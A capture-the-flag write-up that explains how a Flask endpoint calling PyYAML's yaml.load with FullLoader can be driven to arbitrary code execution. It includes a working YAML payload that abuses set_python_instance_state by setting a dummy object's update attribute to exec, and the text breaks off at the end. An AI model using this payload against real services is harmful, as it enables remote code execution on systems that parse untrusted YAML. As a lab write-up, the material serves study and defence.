In this challenge, we're given a link to a website along with the source of its Flask backend. The backend consists of a single route that loads a YAML document we provide in the request body:
@app.route('/', methods=["POST"])
def pwnme():
    if not re.fullmatch(b"^[\n --/-\]a-}]*$", request.data, flags=re.MULTILINE):
        return "Nice try!", 400
    return yaml.load(request.data)
Before anything else, I first verified that this worked as intended. My template for sending YAML files and receiving the result:
import requests
r = requests.post('https://deserializeme.chal.uiuc.tf/', data=open('payload.yaml').read())
print(r.text) # {"hello":"world","number":9}
PyYAML is well-known for having unsafe deserialization, mainly because it supports all sorts of interaction with Python. I'll reference its documentation throughout the writeup.
However, there are two restrictions to keep in mind. First, yaml.load uses FullLoader by default, which bans the !!python/object/apply tag among other things. This means that we won't be able to call arbitrary functions like eval, although we can still construct class objects with the !!python/object/new tag.
Second, this challenge uses a regex filter, which bans the following characters: . ^ _ ` ~ (as well as every control character other than the newline, and all non-ASCII bytes).
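One way to enumerate exactly which printable ASCII characters the filter rejects is to test each byte against the challenge's pattern. This is a minimal sketch; the helper name is_allowed is mine, and the pattern is written as a raw bytes literal only to avoid an invalid-escape warning (the regex itself is unchanged):

```python
import re

# Pattern copied from the challenge's route. In a raw literal, the regex
# engine interprets \n as a newline and \] as a literal ']'.
FILTER = re.compile(rb"^[\n --/-\]a-}]*$", flags=re.MULTILINE)


def is_allowed(byte_value: int) -> bool:
    """Return True if a single byte passes the challenge's filter."""
    return FILTER.fullmatch(bytes([byte_value])) is not None


# Printable ASCII runs from 0x20 (space) through 0x7E (~).
banned_printable = [chr(b) for b in range(0x20, 0x7F) if not is_allowed(b)]
print(banned_printable)  # ['.', '^', '_', '`', '~']
```

The period and the underscore are the two that matter most for what follows: no dotted module paths and no dunder names can appear literally in the payload.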
This prevents us from accessing objects from other modules, which are specified with the <module>.<name> format. Fortunately, PyYAML will use the builtins module by default if you don't supply a period. I'm not sure if this is in the documentation, but the source code proves it:
def find_python_name(self, name, mark, unsafe=False):
    if not name:
        raise ConstructorError("while constructing a Python object", mark,
                "expected non-empty name appended to the tag", mark)
    if '.' in name:
        module_name, object_name = name.rsplit('.', 1)
    else:
        module_name = 'builtins'
        object_name = name
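To make the fallback concrete, here is a simplified stand-in for that lookup. It is not PyYAML's code: resolve_name is a hypothetical helper, and I'm assuming the object is fetched from an already-imported module via sys.modules.

```python
import sys


def resolve_name(name: str):
    """Hypothetical, simplified version of the name lookup shown above."""
    if '.' in name:
        module_name, object_name = name.rsplit('.', 1)
    else:
        # No period supplied: fall back to the builtins module.
        module_name = 'builtins'
        object_name = name
    # Assumption: only modules that are already imported are consulted.
    module = sys.modules[module_name]
    return getattr(module, object_name)


print(resolve_name('exec') is exec)        # True
print(resolve_name('Warning') is Warning)  # True
```

So a tag suffix like exec or Warning needs no period at all, which is exactly what the filter forces on us.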
To summarize, we can construct and reference built-in objects, but we can't call functions directly. Our goal is still to execute arbitrary code.
This is the format for specifying class construction, as per the documentation:
!!python/object/new:module.Class
args: [argument, ...]
kwds: {key: value, ...}
state: ...
listitems: [item, ...]
dictitems: [key: value, ...]
Right away, I was interested in the state field. It turns out that PyYAML uses it to add arbitrary attributes to an object after it's constructed! This won't work for most built-in types, since they have read-only attributes. Fortunately, some classes are writeable: Warning, the Error types, etc. Hence the following creates an object where obj.hello == 'world':
!!python/object/new:Warning
state:
  hello: 'world'
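The difference between writeable and read-only instances can be checked directly in Python, independent of PyYAML. A small sketch:

```python
# Exception types carry a per-instance __dict__, so new attributes stick.
obj = Warning()
for key, value in {'hello': 'world'}.items():
    setattr(obj, key, value)
print(obj.hello)  # world

# str instances have no __dict__, so there is nowhere to store the attribute.
print(hasattr('', '__dict__'))  # False
try:
    setattr('', 'hello', 'world')
except AttributeError as exc:
    print('rejected:', type(exc).__name__)  # rejected: AttributeError
```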
Not every attribute can be set, however. PyYAML calls check_state_key on each key, which matches against a regex. Keys of the form __something__ are banned, which makes some sense. Interestingly, the key extend is also banned. PyYAML justifies this in the source code:
extend is blacklisted because it is used by construct_python_object_apply to add listitems to a newly generate python instance
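The effect of the blacklist can be sketched with two patterns. These are my assumption about what the PyYAML version in question uses (^extend$ and ^__.*__$), and is_blocked is a hypothetical helper, so check constructor.py in your installed version before relying on it:

```python
import re

# Assumption: these two patterns mirror the blacklist behind check_state_key.
BLACKLIST = re.compile('(' + '|'.join(['^extend$', '^__.*__$']) + ')')


def is_blocked(key: str) -> bool:
    """Return True if a state key would be rejected under the assumed patterns."""
    return BLACKLIST.match(key) is not None


for key in ['hello', 'update', 'extend', '__class__', 'extended']:
    print(key, is_blocked(key))
```

Under these patterns only the exact name extend and dunder-style names are rejected; a key such as update goes through.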
Let's look at the construct_python_object_apply method for clarification:
if state:
    self.set_python_instance_state(instance, state)
if listitems:
    instance.extend(listitems)
if dictitems:
    for key in dictitems:
        instance[key] = dictitems[key]
return instance
Notice that if there were no blacklist, this payload would give RCE:
!!python/object/new:Warning
state:
  extend: !!python/name:exec
listitems: 'whatever python code we want'
We first set extend to be the built-in exec function, using the !!python/name tag. Because it is stored as a plain instance attribute, instance.extend is not bound to the instance and behaves like a static method, which PyYAML subsequently calls on listitems - a code string! We've essentially created an object that 'spoofs' a list.
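The spoofing idea itself can be reproduced in plain Python, without PyYAML or its blacklist. In this sketch the "attacker code" is a harmless append, and demo is just a wrapper I added to keep the names local:

```python
def demo():
    log = []
    instance = Warning()
    # Plain instance attribute: no binding happens, so exec receives only
    # the argument that the caller passes in.
    setattr(instance, 'extend', exec)
    listitems = "log.append('ran attacker code')"
    # Same call shape as instance.extend(listitems) in the snippet above.
    instance.extend(listitems)
    return log


print(demo())  # ['ran attacker code']
```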
In general, this bug exists whenever code assumes the type of an object we provide. It must then call a method with an argument that we control as well. I spent a lot of time looking for this scenario in the Flask source code, but I ended up finding one in PyYAML - coincidentally the function which sets state. Here's the source:
def set_python_instance_state(self, instance, state, unsafe=False):
    if hasattr(instance, '__setstate__'):
        instance.__setstate__(state)
    else:
        slotstate = {}
        if isinstance(state, tuple) and len(state) == 2:
            state, slotstate = state
        if hasattr(instance, '__dict__'):
            if not unsafe and state:
                for key in state.keys():
                    self.check_state_key(key)
            instance.__dict__.update(state)
        elif state:
            slotstate.update(state)
        for key, value in slotstate.items():
            if not unsafe:
                self.check_state_key(key)
            setattr(instance, key, value)
Notice that slotstate is assumed to be a dictionary. Yet if state is a tuple, the code destructures it into (state, slotstate). Since no other type checks are performed, we have full control over both objects! In particular, this lets us exploit slotstate.update(state).
We want slotstate to be a dummy object where update points to exec. Hence state should be a tuple containing a code string and dummy object, in that order. One final caveat: in order to reach the elif block, our outer class instance cannot have the __dict__ attribute - a read-only type like str works. Here's a payload which prints the flag:
!!python/object/new:str
state: !!python/tuple
- 'print(getattr(open("flag\x2etxt"), "read")())'
- !!python/object/new:Warning
  state:
    update: !!python/name:exec
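The control flow this payload relies on can be traced without PyYAML. The sketch below is a trimmed copy of the else-branch quoted earlier, with the key checks left out; set_state_sketch and run_demo are hypothetical names of mine, and the code string is a harmless print:

```python
def set_state_sketch(instance, state):
    """Trimmed copy of the quoted else-branch logic (no key checks)."""
    slotstate = {}
    if isinstance(state, tuple) and len(state) == 2:
        state, slotstate = state          # both halves are attacker-controlled
    if hasattr(instance, '__dict__'):
        instance.__dict__.update(state)
    elif state:
        slotstate.update(state)           # becomes exec(code) with a spoofed dict
    for key, value in slotstate.items():
        setattr(instance, key, value)


def run_demo():
    dummy = Warning()
    dummy.update = exec                   # the spoofed dict.update
    code = "print('payload executed')"    # stand-in for the real payload
    try:
        # A str instance has no __dict__, so the elif branch is taken.
        set_state_sketch(str(), (code, dummy))
    except AttributeError as exc:
        return type(exc).__name__
    return 'no exception'


print(run_demo())
```

In this sketch the loop after the update call raises AttributeError, because the dummy object has no items method, but the code string has already run by that point.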
A few more notes:
exec
.getattr
.